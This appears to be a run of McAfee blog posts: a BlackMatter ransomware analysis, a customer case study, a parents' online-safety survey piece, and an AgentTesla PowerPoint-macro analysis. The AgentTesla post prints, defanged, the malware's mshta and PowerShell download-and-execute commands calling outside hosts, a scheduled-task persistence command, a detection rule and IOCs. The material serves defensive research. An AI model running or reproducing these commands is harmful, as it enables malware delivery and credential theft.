The next action is to check if the user that launched the process belongs to the local group of Administrators in the machine using the function “SHTestTokenMembership”. In the case that the user belongs to the administrator group the code will continue normally but in other cases it will get the operating system version using the PEB (to avoid using API functions that can alter the version) and, if it is available, will open the process and check the token to see if that belongs to the Administrators group.
FIGURE 7. BlackMatter checking if it has administrator rights
In the case that the user does not belong to the Administrator group the process token will use a clever trick to escalate privileges.
The first action is to prepare the string “dllhost.exe” and enumerate all modules loaded. For each module it will check one field in the initial structure that all executables have that keeps the base memory address where it will be loaded (for example, kernel32.dll in 0x7fff0000) and will compare with its own base address. If it is equal, it will change its name in the PEB fields and the path and arguments path to “dllhost.exe” (in the case of the path and argument path to the SYSTEM32 folder, where the legitimate “dllhost.exe” exists). This trick is used to try and mislead the user. For each module found it will check the base address of the module with its own base address and, at that moment, will change the name of the module loaded, the path, and arguments to mislead the user.
FIGURE 8. Decryption of the string “dllhost.exe”
The process name will be “dllhost.exe” and the path will be the system directory of the victim machine. This trick, besides not changing the name of the process in the TaskManager, can make a debugger “think” that another binary is loaded and remove all breakpoints (depending on the debugger used).
FIGURE 9. Changing the name and path in the PEB
The second action is to use one exploit using COM (Component Object Model) objects to try to elevate privileges before finishing its own instance using the “Terminate Process” function.
For detection, the module uses an undocumented function from NTDLL.DLL, “LoadedModulesLdrCallback” that lets the programmer set a function as a callback where it can get the arguments and check the PEB. In this callback the malware will set the new Unicode strings using “RtlInitUnicodeString”; the strings are the path to “dllhost.exe” in the system folder and “dllhost.exe” as the image name.
The exploit used to bypass the UAC (User Access Control), which is public, uses the COM interface of CMSTPLUA and the COM Elevation Moniker.
In the case that it has administrator rights or uses the exploit with success, it will continue making the new extension that will be used with the encrypted files. For this task it will read the registry key of “Machine Guid” in the cryptographic key (HKEY LOCAL MACHINE).
This entry and value exist in all versions of Windows and is unique for the machine; with this value it will make a custom hash and get the final string of nine characters.
FIGURE 10. Creating the new extension for the encrypted files
Next, the malware will create the ransom note name and calculate the integrity hash of it. The ransom note text is stored encrypted in the malware data. Usually the ransom note name is “%s.README.txt”, where the wildcard is filled with the new extension generated previously.
The next step is to get privileges that will be needed later; BlackMatter tries to get many privileges:
· SE_BACKUP_PRIVILEGE
· SE_DEBUG_PRIVILEGE, SE_IMPERSONATE_PRIVILEGE · SE_INC_BASE_PRIORITY_PRIVILEGE · SE_INCREASE_QUOTA_PRIVILEGE · SE_INC_WORKING_SET_PRIVILEGE · SE_MANAGE_VOLUME_PRIVILEGE · SE_PROF_SINGLE_PROCESS_PRIVILEGE · SE_RESTORE_PRIVILEGE · SE_SECURITY_PRIVILEGE · SE_SYSTEM_PROFILE_PRIVILEGE · SE_TAKE_OWNERSHIP_PRIVILEGE · SE_SHUTDOWN_PRIVILEGE |
FIGURE 11. Setting special privileges
After getting the privileges it will check if it has SYSTEM privileges, checking the token of its own process. If it is SYSTEM, it will get the appropriate user for logon with the function “WTSQueryUserToken”. This function only can be used if the caller has “SeTcbPrivilege” that, by default, only SYSTEM has.
FIGURE 12. Obtaining the token of the logged on user
After getting the token of the logged on user the malware will open the Windows station and desktop.
In the case that it does not have SYSTEM permissions it will enumerate all processes in the system and try to duplicate the token from “explorer.exe” (the name is checked using a hardcoded hash), if it has rights it will continue normally, otherwise it will check again if the token that was duplicated has administrator rights.
In this case it will continue normally but in other cases it will check the operating system version and the CPU (Central Processing Unit) mode (32- or 64- bits). This check is done using the function “ZwQueryInformationProcess” with the class 0x1A (ProcessWow64Information).
FIGURE 13. Checking if the operating system is 32- or 64-bits
In the case that the system is 32-bits it will decrypt one little shellcode that will inject in one process that will enumerate using the typical “CreateRemoteThread” function. This shellcode will be used to get the token of the process and elevate privileges.
In the case that the system is 64-bits it will decrypt two different shellcodes and will execute the first one that gets the second shellcode as an argument.
FIGURE 14. BlackMatter preparing shellcodes to steal system token
These shellcodes will allow BlackMatter to elevate privileges in a clean way.
Is important to understand that to get the SYSTEM token BlackMatter will enumerate the processes and get “svchost.exe”, but not only will it check the name of the process, it will also check that the process has the privilege “SeTcbPrivilege”. As only SYSTEM has it by default (and it is one permission that cannot be removed from this “user”) it will be that this process is running under SYSTEM and so it becomes the perfect target to attack with the shellcodes and steal the token that will be duplicated and set for BlackMatter.
FIGURE 15. Checking if the target process is SYSTEM
After this it will decrypt the configuration that it has embedded in one section. BlackMatter has this configuration encrypted and encoded in base64.
This configuration has a remarkably similar structure to Darkside, offering another clear hint that the developers are one and the same, despite their claims to the contrary.
After decryption, the configuration can get this information:
|
After getting the configuration and parsing it, BlackMatter will start checking if it needs to make a login with some user that is in the configuration. In this case it will use the function “LogonUser” with the information of the user(s) that are kept in the configuration; this information has one user and one password: “test@enterprise.com:12345” where “test” is the user, “@enterprise.com” is the domain and “12345” the password.
The next action will be to check with the flag to see if a mutex needs to be created to avoid having multiple instances.
This mutex is unique per machine and is based in the registry entry “MachineGuid” in the key “Cryptography”. If the system has this mutex already the malware will finish itself.
Making a vaccine with a mutex can sometimes be useful but not in this case as the developers change the algorithm and only need to set the flag to false to avoid creating it.
FIGURE 16. Creation of the mutex to avoid multiple instances
After, it will check if it needs to send information to the C2. If it does (usually, but not always) it will get information of the victim machine, such as username, computer name, size of the hard disks, and other information that is useful to the malware developers to know how many machines are infected.
This information is encoded with base64 and encrypted with AES using the key in the configuration.
FIGURE 17. Encrypted information sent to the C2
The C2 addresses are in the configuration (but not all samples have them, in this case the flag to send is false). The malware will try to connect to the C2 using a normal protocol or will use SSL checking the initial “http” of the string.
FIGURE 18. Get information of the victim machine and user
The information is prepared in some strings decrypted from the malware and sent in a POST message.
FIGURE 19. Choose to send by HTTP or HTTPS
The message has values to mislead checks and to try and hide the true information as garbage. This “fake” data is calculated randomly.
The C2 returns garbage data but the malware will check if it starts and ends with the characters “{“ and “}”; if it does the malware will ignore sending the information to another C2.
FIGURE 20. Checking for a reply from the C2 after sending
BlackMatter is a multithread application and the procedure to send data to the C2 is done by a secondary thread.
After that, BlackMatter will enumerate all units that are FIXED and REMOVABLE to destroy the recycle bin contents. The malware makes it for each unit that has it and are the correct type. One difference with DarkSide is that it has a flag for this behavior while BlackMatter does not.
The next action is to delete the shadow volumes using COM to try and avoid detection using the normal programs to manage the shadow volumes. This differs with DarkSide that has a flag for this purpose.
FIGURE 21. Destruction of the shadow volumes using COM
BlackMatter will check another flag and will enumerate all services based on one list in the configuration and will stop target services and delete them.
This behavior is the same as DarkSide.
FIGURE 22. Stopping services and deleting them
Processes will be checked and terminated as with DarkSide, based on other configuration flags.
After terminating the processes BlackMatter will stop the threads from entering suspension or hibernating if someone is using the computer to prevent either of those outcomes occurring when it is encrypting files. This is done using the function “ZwSetThreadExecutionState”.
FIGURE 23. Preventing the machine being suspended or hibernated
The next action will be to enumerate all units, fixed and on the network, and create threads to encrypt the files. BlackMatter uses Salsa20 to encrypt some part of the file and will save a new block in the end of the file, protected with the RSA key embedded in the configuration with the Salsa20 keys used to encrypt it. This makes BlackMatter slower than many other ransomwares.
After the encryption it will send to the C2 all information about the encryption process, how many files were crypted, how many files failed, and so on. This information is sent in the manner previously described, but only if the config is set to true.
FIGURE 24. Release of the mutex
If one mutex was created in this moment it will be released. Later it will check the way that the machine boots with the function “GetSystemMetrics”. If the boot was done in Safe Mode BlackMatter will set some keys for persistence in the registry for the next reboot and then attack the system, changing the desktop wallpaper.
FIGURE 25. Determining whether the system boots in safe mode or normal mode
Of course, it will disable the safeboot options in the machine and reboot it (it is one of the reasons why it needs the privilege of shutdown).
To ensure it can launch in safe mode, the persistence key value with the path of the malware will start with a ‘*’.
FIGURE 26. Setting the persistance registry key
If the machine starts in the normal way, it will change the desktop wallpaper with an alternative generated in runtime with some text about the ransom note.
FIGURE 27. BlackMatter makes the new wallpaper in runtime
The new versions have some differences compared with versions 1.2 to 1.6:
Additional changes in version 2.0:
These changes suggest the developers are active on social media, with an interest in malware and security researchers.
Unlike some ransomware we’ve seen in the past, such as GandCrab , BlackMatter has good code, but it does have some design flaws that can be used in some cases to avoid having the malware encrypt the files.
This vaccine is not intended to be used in the normal way, rather only in special cases as, while it works, other programs can be affected (we obviously cannot test all third party programs but potential issues are likely to include data corruption and unpredictable behavior), and the fix is not permanent.
Steps to make the vaccine (proceed at your own risk):
In this moment BlackMatter cannot affect the machine as it needs the registry key to make the ransom extension, and the most important thing is, if it cannot make it, it will return the function WITHOUT decrypting the config that is needed too. In this case it will destroy the recycle bin and shadow volumes anyways but later it will finish as it does not have any behavior to do, RSA Key to protect the files, or anything to send to the C2 as the flag was never read from the config (and the default values are false for all of them).
Though the behavior of other programs may be unpredictable, the vaccine is easy to make, and the system will boot, showing that the BlackMatter programmers made a mistake in the design of the code.
This vaccine works for all versions, including 2.0.
The sample uses the following MITRE ATT&CK techniques:
Technique ID | Technique Description | Observable |
T1134 | Access Token Manipulation | BlackMatter accesses and manipulates different process tokens. |
T1486 | Data Encrypted for Impact | BlackMatter encrypts files using a custom Salsa20 algorithm and RSA. |
T1083 | File and Directory Discovery
|
BlackMatter uses native functions to enumerate files and directories searching for targets to encrypt. |
T1222.001 | Windows File and Directory Permissions Modification | BlackMatter executes the command icacls “<DriveLetter>:\*” /grant Everyone: F /T /C /Q to grant full access to the drive. |
T1562.001 | Disable or Modify Tools | BlackMatter stops services related to endpoint security software. |
T1106 | Native API | BlackMatter uses native API functions in all code. |
T1057 | Process Discovery | BlackMatter enumerates all processes to try to discover security programs and terminate them. |
T1489 | Service Stop | BlackMatter stops services. |
T1497.001 | System Checks | BlackMatter tries to detect debuggers, checking the memory reserved in the heap. |
T1135 | Network Share Discovery | BlackMatter will attempt to discover network shares by building a UNC path in the following format for each driver letter, from A to Z: \\<IP>\<drive letter>$ |
T1082 | System Information Discovery | BlackMatter uses functions to retrieve information about the target system. |
T1592 | Gather Victim Host Information | BlackMatter retrieves information about the user and machine. |
T1070 | Valid Accounts | BlackMatter uses valid accounts to logon to the victim network. |
T1547 | Boot or Logon Autostart Execution | BlackMatter installs persistence in the registry. |
T1102 | Query Registry | BlackMatter queries the registry for information. |
T1018 | Remote System Discovery | BlackMatter enumerates remote machines in the domain. |
T1112 | Modify Registry | BlackMatter changes registry keys and values and sets new ones. |
BlackMatter is a new threat in the ransomware field and its developers know full well how to use it to attack their targets. The coding style is remarkably similar to DarkSide and, in our opinion, the people behind it are either the same or have a very close relationship.
BlackMatter shares a lot of ideas, and to some degree code, with DarkSide:
It is important to keep your McAfee Enterprise products updated to the latest detections and avoid insecure remote desktop connections, maintain secure passwords that are changed on a regular basis, take precautions against phishing emails, and do not connect unnecessary devices to the enterprise network.
Despite some effective coding, mistakes have been made by the developers, allowing the program to be read, and a vaccine to be created, though we will stress again that it can affect other programs and is not a permanent solution and should be employed only if you accept the risks associated with it.
The post BlackMatter Ransomware Analysis; The Dark Side Returns appeared first on McAfee Blog.
Hyper-growth and a determination to stand above the crowd compelled a popular Eastern European telecom to upgrade its trusty McAfee Enterprise security infrastructure, which they relied on for many years to protect their 8,000 corporate endpoints. Competitive pressure to keep costs low and cybercriminals at bay for both their internal users and their customers spurred the mobile and fixed telephony company to enhance their existing security architecture with the latest endpoint and cloud-based protections from McAfee Enterprise.
The integrated McAfee Enterprise approach—with ePolicy Orchestrator ( ePO) at the helm as the single-pane-of-glass management hub—enabled the security architect to build out a strong security foundation, with McAfee Enterprise endpoint and data protection solutions and Microsoft Defender as the mainstays of the telecom’s line of defense.
With ransomware and other advanced threats grabbing headlines, the telecom company felt a pressing need to upgrade its McAfee Enterprise infrastructure and expand its on-premises endpoint protection to cloud-based McAfee Enterprise Endpoint Security. The organization also added MVISION Endpoint Threat Detection and Response (MVISION® EDR) and deployed two McAfee Enterprise Advanced Threat Defense appliances for dynamic and static sandboxing. These deployments were easily integrated into the telecom’s existing security architecture—with all solutions managed by McAfee Enterprise ePO software.
McAfee Enterprise Endpoint Security was instrumental in both simplifying and boosting endpoint protection, as multiple technologies—Threat Protection, Firewall, Web Control, and Adaptive Threat Prevention—are consolidated into a single agent. Leveraging threat data from local endpoints and McAfee Enterprise Global Threat Intelligence in the cloud, the telecom’s security team is also empowered to detect zero-day threats in near real time. When a threat is identified on a given endpoint, that information is automatically shared with all the other endpoints. And when an unknown or suspicious file is detected, it is immediately quarantined for analysis by MVISION EDR or the McAfee Endpoint Advanced Threat Defense sandbox.
Investigation had once been a lengthy and laborious manual process, often taking days or weeks. Sometimes detections of malicious activity were even ignored due to time constraints. But, after implementing MVISION EDR, things changed dramatically. Investigations and remediations now take as little as 10 to 15 minutes. The security team is catching more threats than ever before, their workflows are streamlined, and investigations are faster. Best of all, thanks to MVISION EDR, team members have expanded their threat-hunting capacity—without augmenting their staff.
Because McAfee Enterprise Advanced Threat Defense appliances and MVISION EDR are integrated with McAfee Enterprise SIEM solutions and McAfee Enterprise ePO software, suspicious activity at an endpoint automatically triggers an investigation. Advanced analytics and artificial intelligence (AI) in MVISION enable administrators to understand the alert, sort out the facts, and remediate any threat. MVISION EDR does all the preparatory work, gathering and distilling relevant data, such as IP addresses and information about devices and users. Graphic visualizations and AI-guided investigations help analysts quickly get a grasp on what’s happening. The security team can also run real-time queries to see if something similar has occurred anywhere else, and they can conduct historical searches for greater context.
“The volume of malware we have to deal with has definitely shrunk since implementing McAfee Enterprise Endpoint Security. But the addition of MVISION EDR has made an even bigger impact on security posture. When our endpoints do encounter malware, we can now respond many times faster and more effectively than ever before,” points out the security architect.
The enhanced McAfee Enterprise security architecture has transformed the telecom company’s approach to maintaining a more resilient security posture. The company is now taking a more proactive defense as a result of the new, fully coordinated McAfee Enterprise toolset.
In addition to advanced threat-hunting capabilities, the ability to share threat information across the organization via the Data Exchange Layer (DXL) has also contributed to a more proactive stance. For example, whenever a malicious file is identified, that information is automatically added to the McAfee Enterprise Threat Intelligence Exchange threat reputation database and shared with all DXL-connected systems: endpoints, SIEM, Advanced Threat Defense sandboxes, MVISION EDR software, and even the company’s Cisco pxGrid infrastructure, a multivendor, cross-platform network system that pulls together different parts of an IT infrastructure.
The European telecom company has plans to migrate to the cloud, beginning with Microsoft Office 365 and Microsoft Azure. For the time being, the organization plans to keep the McAfee Enterprise ePO management console on premises, but, in the very near future, the plan is to protect internet-only users with cloud-based MVISION ePO.
“Taking measured steps to augment our security infrastructure has helped us succeed at keeping our company and customers secure,” say the security architect. “It’s nice to know that McAfee Enterprise can support us wherever we are in our journey and can extend our integrated security infrastructure from device to cloud when we’re ready.”
The post European Telecom Company Expands Its Footprint to Better Protect Users and Customers appeared first on McAfee Blog.
Despite the old adage that it takes a village to raise a child, new research from McAfee shows that an overwhelming majority (80%) of Aussies believe schools should be taking the lead in teaching our kids about online safety.
At the time of the survey in April 2021, nearly 40% of Aussie households had at least one family member participating in online learning – a number that has most definitely increased in recent months as the Delta variant hit Australian shores causing many schools to shut.
But despite this turn of circumstances, nearly half (48%) of Aussies didn’t take any proactive security measures to protect their family/home when distance learning was introduced, with 34% saying they saw no increased risk to their children’s online safety.
Now, here’s the interesting thing – these same respondents nominated in the same survey that they were extremely worried about their kids’ exposure to scams (43%), sharing personal information (43%), illegal content (35%), cyber-bullying (40%) and misinformation (31%). Confusing, I know!
There’s no doubt that managing kids and home learning while trying to keep your day job and keep the household running is an extremely tough gig! In fact, I think thousands of Aussie parents will deserve medals after this chapter in our lives is over! But, I think these statistics aren’t just about being overwhelmed and a lack of energy – as 80% of surveyed Aussies nominated that they believe it is in fact the responsibility of schools to teach our kids how to be safe online. Only 8% considered cyber safety to be the responsibility of the parent.
If there is anyone who gets just how intense family life can be it’s me! With four boys, 2 cats, a dog (and an action-orientated husband) to manage, I have spent years living in chaos! And I understand that it can often feel like a relief knowing that something can be outsourced or managed by someone else. But, when it comes to something as important as our kids’ online safety, it’s essential that we put that top of our list. Forget about the ironing and focus on your kids’ digital lives instead. I’ve been an advocate of letting body heat remove wrinkles for years!
Even if your child’s school is teaching digital wellness, it’s imperative that these messages are also reinforced at home. Here’s what I recommend you do to get your family’s digital safety back on track:
Ensure the devices your kids are using for school or homework have up-to-date software and security settings. Software updates are usually designed to address security weaknesses so using outdated software can be quite risky!
Using weak and default passwords is, without a doubt, one of the easiest ways to get into trouble online. Ensure your kids have complex passwords for EACH of their online accounts and devices. Passwords should contain numbers, special characters and both lower- and upper-case letters. I’m a big fan of a crazy sentence. Why not consider a password manager like McAfee’s free True Key to help them generate and remember their passwords – I know I couldn’t survive without mine!
Why not consider using a VPN when your kids are accessing online learning services from home to protect the privacy of the internet connection? VPN’s use bank-grade level encryption to stop hackers from stealing personal information like passwords or data.
With both misinformation and disinformation a major concern for Aussie parents, it’s critical that us parents educate our kids about fake news: how to spot it and why they shouldn’t share it. Encouraging kids to question what they read or watch online before deciding whether it is to be believed and shared will help establish important digital critical thinking skills.
I’m a big fan of family dinners, even if it’s a humble bowl of spaghetti bolognese! In my opinion, it’s the perfect time to weave in messages of all types but particularly ones of a digital safety nature. Why not share stories of data breaches and what affected consumers had to do to prevent being hacked? Share news stories about new apps or scams, stories of kindness online, and digital citizenship you’ve witnessed online. Once you start sharing, you’ll likely find your kids want to share their stories too. But always keep calm and interested – otherwise they’ll stop talking!!
As a mum of four and cybersafety ambassador, I believe that a village approach is the absolute best way of setting our kids up for safe and positive interactions online. So, if you’re feeling unsure about what to tell your kids, spend some time educating yourself. We are lucky enough to have a dedicated eSafety Commissioner here in Australia who has a plethora of resources for Aussie parents. Spend some time checking it out, I promise it will be worth it!
Till next time, stay safe everyone!
Alex xx
The post “School Should Be Teaching Online Safety” says 80% of Aussie Parents appeared first on McAfee Blog.
Authored by Anuradha M
McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to deliver variants of AgentTesla which is a well-known password stealer. These spam emails purport to be related to financial transactions.
AgentTesla is a RAT (Remote Access Trojan) malware that has been active since 2014. Attackers use this RAT as MASS(Malware-As-A-Service) to steal user credentials and other information from victims through screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly via phishing campaigns.
During Q2, 2021, we have seen an increase in PowerPoint malware.
In this campaign, the spam email contains an attached file with a .ppam extension which is a PowerPoint file containing VBA code. The sentiment used was finance-related themes such as: “New PO300093 Order” as shown in Figure 2. The attachment filename is “300093.pdf.ppam”.
PPAM file:
This file type was introduced in 2007 with the release of Microsoft Office 2007. It is a PowerPoint macro-enabled Open XML add-in file. It contains components that add additional functionality, including extra commands, custom macros, and new tools for extending default PowerPoint functions.
Since PowerPoint supports ‘add-ins’ developed by third parties to add new features, attackers abuse this feature to automatically execute macros.
Technical Analysis:
Once the victim opens the “.ppam” file, a security notice warning pop-up as shown in Figure 3 to alert the user about the presence of macro.
From Figure 4, you can see that the Add-in feature of the PowerPoint can be identified from the content of [Content_Types].xml file which will be present inside the ppam file.
The PPAM file contains the following files and directories which can be seen upon extraction.
Once the victim enables the macro, the add-in gets installed silently without user knowledge, which can be seen in Figure 5. On seeing that there is no content and no slide in the PowerPoint, the user will close the file but, in the backend, macro code gets executed to initiate the malicious activity.
As you can see in Figure 6, the macro is executed within the add-in auto_open() event i.e.., macro is fired immediately after the presentation is opened and the add-in is loaded.
The PowerPoint macro code on execution launches an URL by invoking mshta.exe (Microsoft HTML Application) which is shown in Figure 7. The mshta process is launched by Powerpoint by calling the CreateProcessA() API.
Below are the parameters passed to CreateProcessA() API:
kernel32.CreateProcessA(00000000,mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh,00000000,00000000,00000001,00000020,00000000,00000000,D,
Below is the command line parameter of mshta:
mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh
The URL hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” but it didn’t get any response from “27.html” at the time of analysis.
Later mshta.exe spawns powershell.exe as a child process.
Below is the command line parameters of PowerShell:
powershell.exe - ”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt‘) -useB);
PowerShell downloads and executed script files from the above-mentioned URLs.
The below Figure 8 shows the content of the first url – “hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt”:
There are two binary files stored in two huge arrays inside each downloaded PowerShell file. The first file is an EXE file that acts as a loader and the second file is a DLL file, which is a variant of AgentTesla. PowerShell fetches the AgentTesla payload from the URLs mentioned in the command line, decodes it, and launches MSBuild.exe to inject the payload within itself.
Schedule Tasks:
To achieve persistence, it creates a scheduled task in “Task Scheduler” and drops a task file under C:\windows\system32\SECOTAKSA to make the entire campaign work effectively.
The new task name is “SECOTAKSA”. Its action is to execute the command “mshta hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html” and it’s called every 80 minutes.
Below is the command line parameters of schtasks:
schtasks.exe - “C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”\””MsHtA””\””hxxp://1230948%1230948@0v2x.blogspot.com/p/27.html\“”
Infection Chain:
Process Tree:
Mitigation:
McAfee’s Endpoint Security (ENS) and Windows Systems Security (WSS) product have DAT coverage for this variant of malware.
This malicious PPAM document with SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as “W97M/Downloader.dkw”.
The PPAM document is also blocked by the AMSI feature in ENS as AMSI-FKN!
Additionally, the Exploit Prevention feature in McAfee’s Endpoint Security product blocks the infection chain of this malware by adding the below expert rule so as to protect our customers from this malicious attack.
Expert Rule authored based on the below infection chain:
POWERPNT.EXE –> mshta.exe
Expert Rule:
Rule {
Process {
Include OBJECT_NAME { -v “powerpnt.exe” }
}
Target {
Match PROCESS {
Include OBJECT_NAME { -v “mshta.exe” }
Include PROCESS_CMD_LINE { -v “**http**” }
Include -access “CREATE”
}
}
}
IOCs
URLs:
hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh
hxxp:// //1230948%1230948@0v2x.blogspot.com/p/27.html
hxxps://p8hj[.]blogspot[.]com/p/27.html
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-1.txt
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-2.txt
hxxps://ia801403.us.archive.org/23/items/150-Re-Crypted-25-June/27-3.txt
EML files:
72e910652ad2eb992c955382d8ad61020c0e527b1595619f9c48bf66cc7d15d3
0afd443dedda44cdd7bd4b91341bd87ab1be8d3911d0f1554f45bd7935d3a8d0
fd887fc4787178a97b39753896c556fff9291b6d8c859cdd75027d3611292253
38188d5876e17ea620bbc9a30a24a533515c8c2ea44de23261558bb4cad0f8cb
PPAM files:
fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182
6c45bd6b729d85565948d4f4deb87c8668dcf2b26e3d995ebc1dae1c237b67c3
9df84ffcf27d5dea1c5178d03a2aa9c3fb829351e56aab9a062f03dbf23ed19b
ad9eeff86d7e596168d86e3189d87e63bbb8f56c85bc9d685f154100056593bd
c22313f7e12791be0e5f62e40724ed0d75352ada3227c4ae03a62d6d4a0efe2d
Extracted AgentTesla files:
71b878adf78da89dd9aa5a14592a5e5da50fcbfbc646f1131800d02f8d2d3e99
90674a2a4c31a65afc7dc986bae5da45342e2d6a20159c01587a8e0494c87371
The post Malicious PowerPoint Documents on the Rise appeared first on McAfee Blog.